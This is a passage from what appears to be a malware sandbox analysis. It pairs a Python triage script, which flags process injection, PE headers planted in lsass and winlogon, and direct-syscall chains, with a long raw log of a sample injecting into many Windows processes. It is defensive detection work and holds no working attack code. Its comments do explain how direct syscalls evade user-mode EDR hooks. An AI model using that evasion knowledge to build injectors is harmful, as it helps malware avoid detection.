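Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtProtectVirtualMemory: Direct from: 0x401DD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtAllocateVirtualMemory: Direct from: 0x401D97
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
"""

THREAD_RE = re.compile(
    r"^Source: (?P<src>.+?) Thread created: (?P<target>.+?) EIP: (?P<eip>[0-9A-Fa-f]+)$")
SYSCALL_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<api>Nt\w+): Direct from: 0x(?P<addr>[0-9A-Fa-f]+)")
MEMWRITE_RE = re.compile(
    r"^Source: (?P<src>.+?) Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)"
    r" value starts with: (?P<magic>[0-9A-Fa-f]+)")

# The four syscalls that together form a classic remote injection: allocate
# memory in the target, write the payload, fix protections, start a thread on it.
INJECTION_PRIMITIVES = frozenset({
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtProtectVirtualMemory", "NtCreateThreadEx"})


def parse_report(text):
    """Turn report lines into event dicts; lines of any other kind are ignored."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if (m := THREAD_RE.match(line)):
            events.append({"kind": "thread", "src": m["src"], "target": m["target"],
                           "eip": int(m["eip"], 16)})
        elif (m := SYSCALL_RE.match(line)):
            events.append({"kind": "syscall", "src": m["src"], "api": m["api"],
                           "addr": int(m["addr"], 16)})
        elif (m := MEMWRITE_RE.match(line)):
            events.append({"kind": "memwrite", "src": m["src"], "target": m["target"],
                           "base": int(m["base"], 16), "magic": m["magic"].upper()})
    return events


def pe_header_writes(events):
    """Map each writer to the other processes it wrote an MZ header into.
    Writes whose source and target path match are returned separately: a process
    rewriting its own image (self-unpacking) is a different signal from a process
    planting a PE in winlogon or lsass."""
    foreign, self_writes = defaultdict(set), defaultdict(set)
    for ev in events:
        if ev["kind"] != "memwrite" or not ev["magic"].startswith("4D5A"):
            continue
        bucket = self_writes if ev["src"].lower() == ev["target"].lower() else foreign
        bucket[ev["src"]].add(ev["target"])
    return ({k: sorted(v) for k, v in foreign.items()},
            {k: sorted(v) for k, v in self_writes.items()})


def shared_thread_offsets(events, low_bits=16, min_hits=3):
    """Count thread start addresses by their low bits. Many threads whose EIP
    shares the same low 16 bits but differs above them is the same code mapped
    at a different base in many processes (one entry RVA in a DLL or shellcode
    blob), which is what the 2EBC / 25AC runs in the report look like.
    Heuristic only (assumption): a sandbox target of 'unknown' means the
    sandbox could not resolve the target process, not that there was none."""
    mask = (1 << low_bits) - 1
    hits = Counter(ev["eip"] & mask for ev in events if ev["kind"] == "thread")
    return {off: n for off, n in hits.items() if n >= min_hits}


def direct_syscall_chains(events):
    """Sources that issued every injection primitive as a direct syscall, i.e.
    without calling the ntdll export, so user-mode EDR hooks never see them."""
    seen = defaultdict(set)
    for ev in events:
        if ev["kind"] == "syscall" and ev["api"] in INJECTION_PRIMITIVES:
            seen[ev["src"]].add(ev["api"])
    return sorted(src for src, apis in seen.items() if apis == INJECTION_PRIMITIVES)


def triage(text):
    """Run all three checks over raw report text and return the findings."""
    events = parse_report(text)
    foreign, self_writes = pe_header_writes(events)
    return {
        "pe_written_into_foreign_processes": foreign,
        "pe_written_into_own_image": self_writes,
        "shared_thread_entry_offsets": shared_thread_offsets(events),
        "direct_syscall_injectors": direct_syscall_chains(events),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LOG), indent=2, default=str))
```

Run against the full report rather than the sample, the foreign-write map is the list of processes that must be treated as compromised (the rootkit component is resident in each of them, which is also why the "Hooks ... query functions" signatures fire), and the direct-syscall check explains why a user-mode EDR hook on NtWriteVirtualMemory would have recorded nothing from sihost64.exe.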
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC60380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 210918F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24ED0B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20955300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22687920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 29E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A0126F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 251F17A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000 value starts with: 4D5A
